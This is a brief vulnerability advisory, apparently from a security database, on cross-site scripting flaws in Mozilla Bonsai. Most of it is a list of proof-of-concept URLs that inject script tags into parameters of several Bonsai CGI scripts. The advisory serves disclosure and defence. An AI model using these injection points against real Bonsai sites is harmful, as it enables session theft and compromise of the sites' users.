|
Mozilla Bonsai Multiple Cross Site Scripting Vulnerabilities
The following proof of concepts have been provided by Stan Bubrouski <stan@ccs.neu.edu>: /webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert(document.domain)</script> /webtools/bonsai/cvslog.cgi?file=<script>alert(document.domain)</script> /webtools/bonsai/cvsblame.cgi?file=/index.html&root=<script>alert(document.domain)</script> /webtools/bonsai/cvsblame.cgi?file=<script>alert(document.domain)</script> /cvsquery.cgi?branch=<script>alert(document.domain)</script>&file=<script>alert(document.domain)</script> &date=<script>alert(document.domain)</script> /cvsquery.cgi?module=<script>alert(document.domain)</script>&branch=&dir=&file= &who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week /showcheckins.cgi?person=<script>alert(document.domain)</script> /cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert(document.domain)</script>&branch=HEAD |
|
|
Privacy Statement |